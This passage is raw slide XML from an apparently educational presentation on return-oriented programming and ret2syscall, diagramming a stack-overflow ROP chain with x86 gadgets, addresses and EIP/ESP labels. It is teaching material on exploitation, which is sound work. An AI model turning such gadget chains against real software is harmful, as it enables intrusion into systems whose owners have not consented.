          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="左大括号 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5F22289-FEBC-4F5F-A9F5-2EF24E38A672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8397025" y="2059185"/>
            <a:ext cx="438251" cy="3888582"/>
          </a:xfrm>
          <a:prstGeom prst="lef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82CB9E60-2E15-4303-B6CD-D48307518706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6916853" y="3772643"/>
            <a:ext cx="1204176" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Shape 1693">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402B94DC-0704-487A-96A3-E8DB0FE10DCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip>
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364054" y="1592386"/>
            <a:ext cx="2157871" cy="1222648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Shape 1694">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA033AE0-987B-4ADF-A392-E99338C61B5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip>
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364054" y="4008969"/>
            <a:ext cx="1924776" cy="1938798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Shape 1695">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05E21548-7103-4F84-831B-A23C0DBB64FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3180277" y="3454314"/>
            <a:ext cx="488877" cy="438251"/>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 name="Shape 1696">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{413AF540-8566-4141-A053-1B4AE2BBC78E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364054" y="2814686"/>
            <a:ext cx="2291759" cy="404629"/>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US" altLang="zh-CN" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 1697">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1568187-FA61-4DA5-9C5E-007C32EA5835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2383305" y="5977099"/>
            <a:ext cx="2157871" cy="404629"/>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US" altLang="zh-CN" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ayload</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94200275-886D-46C4-B617-F6999460165F}"/>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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41622758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588"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1590" name="Shape 1590"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="4601917"/>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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x08052318</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1591" name="Shape 1591"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="3838317"/>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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x0c0c0c0c</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1592" name="Shape 1592"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="3074717"/>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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x0809951f</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1593" name="Shape 1593"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="2304667"/>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0x080788c1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1594" name="Shape 1594"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="4778933"/>
            <a:ext cx="35812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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop %edx; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1595" name="Shape 1595"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="3224200"/>
            <a:ext cx="35812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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>xor %eax, %eax; ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1596" name="Shape 1596"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="2481651"/>
            <a:ext cx="35812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mov %eax, (%edx); ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1597" name="Shape 1597"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162473" y="4389000"/>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ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1598" name="Shape 1598"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8059740" y="4593800"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1599" name="Shape 1599"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="5563900"/>
            <a:ext cx="3581200" cy="409600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1600" name="Shape 1600"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1599" idx="0"/>
            <a:endCxn id="1594" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="5188700"/>
            <a:ext cx="0" cy="375200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1601" name="Shape 1601"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1594" idx="0"/>
            <a:endCxn id="1595" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="3633733"/>
            <a:ext cx="0" cy="1145200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1602" name="Shape 1602"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1595" idx="0"/>
            <a:endCxn id="1596" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="2891400"/>
            <a:ext cx="0" cy="332800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1603" name="Shape 1603"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1590" idx="1"/>
            <a:endCxn id="1594" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="4983717"/>
            <a:ext cx="2271200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1604" name="Shape 1604"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1592" idx="1"/>
            <a:endCxn id="1595" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="3428917"/>
            <a:ext cx="2271200" cy="27600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1605" name="Shape 1605"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1593" idx="1"/>
            <a:endCxn id="1596" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="2686467"/>
            <a:ext cx="2271200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1606" name="Shape 1606"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1320807" y="4778927"/>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EIP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1607" name="Shape 1607"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2218073" y="4983727"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1608" name="Shape 1608"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="1534600"/>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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x41414141</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03406D20-12E8-432C-ADDF-6E3AC5DECF06}"/>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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Shape 1589">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAB83BC1-A83C-4665-AF91-093EA999F710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299153" y="890764"/>
            <a:ext cx="8298180" cy="763588"/>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solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(Return Oriented Programming)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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4" name="Shape 1614"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="4601917"/>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0x08052318</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1615" name="Shape 1615"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="3838317"/>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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1616" name="Shape 1616"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="3074717"/>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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x0809951f</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1617" name="Shape 1617"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="2304667"/>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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>0x080788c1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1618" name="Shape 1618"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="4778933"/>
            <a:ext cx="3581200" cy="409600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
